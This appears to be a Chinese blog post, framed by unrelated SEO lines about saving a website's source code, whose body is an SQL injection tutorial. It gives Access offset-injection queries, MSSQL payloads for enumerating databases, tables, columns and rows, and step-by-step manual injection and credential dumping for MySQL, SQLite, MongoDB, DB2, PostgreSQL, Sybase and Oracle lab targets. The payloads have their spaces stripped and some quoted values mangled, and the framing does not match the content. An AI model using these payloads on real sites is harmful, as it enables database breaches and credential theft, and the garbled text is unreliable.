今天给各位分享如何保存对方网站源码分享的知识,其中也会对怎样保存一个网站全部内容包括链接进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!
前言
SQL作用在关系型数据库上面,什么是关系型数据库?关系型数据库是由一张张的二维表组成的,常见的关系型数据库厂商有MySQL、SQLite、SQLServer、Oracle,由于MySQL是免费的,所以企业一般用MySQL的居多。WebSQL是前端的数据库,它也是本地存储的一种,使用SQLite实现,SQLite是一种轻量级数据库,它占的空间小,支持创建表,插入、修改、删除表格数据,但是不支持修改表结构,如删掉一纵列,修改表头字段名等。但是可以把整张表删了。同一个域可以创建多个DB,每个DB有若干张表。
与数据库产生交互就有可能存在注入攻击,不只是MySQL数据库,还有Oracle,MongoDB等数据库也可能会存在注入攻击。
简要学习各种数据库的注入特点
数据库架构组成,数据库高权限操作
简要了解各数据库
Access,Mysql,mssql(MicrosoftSQLserver),mongoDB,postgresql,sqlite,oracle,sybase等
Access
表名
列名
数据
Access数据库保存在网站源码下面,自己网站数据库独立存在,所以无法进行跨库,也没有文件读写的操作。
除了Access其他数据库组成架构基本都是大同小异。
mysqlmssql等
数据库名A
表名
列名
数据
数据库名B
。。。。。。
每个数据库功能不同,我们采取注入的时候攻入方式不同
什么决定网站注入点用户权限?
数据库配置文件的用户,是谁连接的
Access偏移注入
如果遇到列名猜解不到的情况,则可以使用Access偏移注入
原理
借用数据库的自连接查询让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示
用途
解决知道Access数据库中知道表名,但是得不到字段的sql注入困境
特点
a.成功与否看技巧与运气,不能保证100%成功。
b.无需管理员账号密码字段,直接爆账号密码
利用条件
a.已知管理表名
b.已知任意字段(一个或多个会增加机率,最常见的就是id)
影响偏移注入成功因素
a.管理表的字段数越少越好(最好是三个:id账号字段密码字段)
b.当前注入点的脚本内查询的表内的字段数越多越好
流程
a.判断字段数
b.判断表名
c.开始偏移注入
本地Access偏移注入靶场
偏移量就是逐步增加或递减,直到出现结果。*表示可代替的字符串,用*代替22,返回界面依旧报错,然后用*代替21,依次递减。22-16=6,6表示该表中的列名个数。
*代表6个,后面一串字符代表两倍,就相当于2倍*,12个
爆列名数据
一级偏移语句:unionselect1,2,3,4,5,6,7,8,9,10,*from(adminasainnerjoinadminasbona.id=b.id)\n二级偏移语句:unionselect1,2,3,4,a.id,b.id,c.id,*from((adminasainnerjoinadminasbona.id=b.id)innerjoinadminascona.id=c.id)
二级偏移,3倍*,所以为18个
查看登录框源代码的表单值或观察URL特征等也可以针对表或列获取不到的情况
猜解表名可能是ZB_admin,观察网站地址特征,是否有前缀。
或者看登录框表单值
SQLserver/MSSQL注入
介绍
MicrosoftSQLServer是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。MicrosoftSQLServer数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。
过程
①判断数据库类型
andexists(select*fromsysobjects)–返回正常为mssql(也名sqlserver)
andexists(selectcount(*)fromsysobjects)–有时上面那个语句不行就试试这个哈
②判断数据库版本
and1=@@version–这个语句要在有回显的模式下才可以哦
andsubstring((select@@version),22,4)=&39;–适用于无回显模式,后面的2008就是数据库版本,返回正常就是2008的复制代码第一条语句执行效果图(类似):第二条语句执行效果图:(如果是2008的话就返回正常)
③获取所有数据库的个数(一下3条语句可供选择使用)
1.and1=(selectquotename(count(name))frommaster..sysdatabases)–
2.and1=(selectcast(count(name)asvarchar)%2bchar(1)frommaster..sysdatabases)–
3.and1=(selectstr(count(name))%2b&39;frommaster..sysdatabaseswheredbid>5)–
and1=(selectcast(count(name)asvarchar)%2bchar(1)frommaster..sysdatabaseswheredbid>5)–
说明:dbid从1-4的数据库一般为系统数据库.
⑤获取数据库(该语句是一次性获取全部数据库的,且语句只适合>=2005,两条语句可供选择使用)
and1=(selectquotename(name)frommaster..sysdatabasesFORXMLPATH(&39;))–
and1=(select&39;%2bname%2b&39;frommaster..sysdatabasesFORXMLPATH(&39;))–
⑥获取当前数据库
anddb_name()>0
and1=(selectdb_name())–
⑦获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库所有表(只限于mssql2005及以上版本)】
and1=(selectquotename(name)from数据库名..sysobjectswherextype=&39;FORXMLPATH(&39;))–
and1=(select&39;%2bname%2b&39;from数据库名..sysobjectswherextype=&39;FORXMLPATH(&39;))–
⑧获得表里的列
一次爆指定表的所有列(只限于mssql2005及以上版本):
and1=(selectquotename(name)from数据库名..syscolumnswhereid=(selectidfrom数据库名..sysobjectswherename=&39;)FORXMLPATH(&39;))–
and1=(select&39;%2bname%2b&39;from数据库名..syscolumnswhereid=(selectidfrom数据库名..sysobjectswherename=&39;)FORXMLPATH(&39;))–
⑨获取指定数据库中的表的列的数据库
逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):
and1=(selecttop1*from指定数据库..指定表名where排除条件FORXMLPATH(&39;))–
一次性爆N条所有字段的数据(只限于mssql2005及以上版本):
and1=(selecttopN*from指定数据库..指定表名FORXMLPATH(&39;))–复制代码第一条语句:and1=(selecttop1*from指定数据库..指定表名FORXMLPATH(&39;))–测试效果图:———————————-加上where条件筛选结果出来会更加好,如:whereandnamelike&39;就会筛选出含有user关键词的出来。用在筛选表段时很不错。
转自:http://www.myhack58.com/Article/html/3/8/2015/63146.htm
PostgraSQL注入原理
https://www.webshell.cc/524.html
https://www.cnblogs.com/yilishazi/p/14710349.html
https://www.jianshu.com/p/ba0297da2c2e
Oracle注入
https://www.cnblogs.com/peterpan0707007/p/8242119.html
MongoDB注入
https://blog.csdn.net/weixin_33881753/article/details/87981552
https://www.secpulse.com/archives/3278.html
各数据库手工注入
MySQL:
1.找到注入点and1=1and1=2测试报错
2.orderby5联合查询,2和3可以显示信息
4.获取数据库信息
user()==>root
database()==>mozhe_Discuz_StormGroup
version()==>5.7.22-0ubuntu0.16.04.1
5.获取数据库表
table_name表名
information_schema.tables系统生成信息表
table_schema=数据库名16进制或者用单引号括起来
改变limit0,1中前一个参数,得到两个表StormGroup_membernotice
6.获取列名
结果如下id,name,password,status
7.脱裤
Access:
1.and1=2报错找到注入点
2.orderby获取总字段
3.猜解表名andexists(select*fromadmin)页面返回正常,说明存在admin表
4.猜解列名andexists(selectidfromadmin)页面显示正常,admin表中存在id列username,passwd同样存在
5.脱裤unionselect1,username,passwd,4fromadmin
MSSQL:
1.and1=2报错
2.orderbyN#获取总字段
3.猜表名andexists(select*frommanage)表名manage存在
4.猜解列名andexists(selectidfrommanage)列名id存在,同样username,password也存在
5.脱裤andexists(selectidfrommanagewhereid=1)证明id=1存在
andexists(selectidfrommanagewhere%20len(username)=8andid=1)猜解username字段长度为8
andexists(selectidfrommanagewhere%20len(password)=16andid=1)猜解password字段长度为16
可用Burp的Intruder功能辅助猜解
猜解username第1到8位的字符,ASCII转码admin_mz
猜解password第1到16位的字符,ASCII转码(Burp爆破)
转ASCII的py脚本:
72e1bfc3f01b7583MD5解密为97285101
SQLite:
1.找注入点and1=1
2.orderbyN猜字段4
3.猜数据库
offset==>0~2
有三个数据库:
WSTMart_reg
notice_sybase
sqlite_sequence
4.猜列
共有3个字段:
id,name,password
5.脱裤
MongoDB:
1.id=1′单引号注入报错
2.闭合语句,查看所有集合
3.查看指定集合的数据
[0]代表第一条数据,可递增
DB2:
1.and1=2判断注入点
2.orderbyN获取字段数
3.爆当前数据库
GAME_CHARACTER
4.列表
NAME
5.脱裤
PostgreSQL:
1.and1=2判断注入点
2.orderbyN获取字段
3.爆数据库
4.列表
5.列字段
6.拖库
Sybase数据库:
1.and1=2判断注入点
2.orderbyN获取总字段
3.爆数据库
4.列表
5.列字段
6.查状态
结果为:zhang
7.反选爆用户名
结果为:mozhe
8.猜解密码
Oracle:
1.and1=1
2.orderby
3.爆数据库
4.列表
5.列字段
6.拖库
加上状态:1whereSTATUS=1
关于如何保存对方网站源码分享到此分享完毕,希望能帮助到您。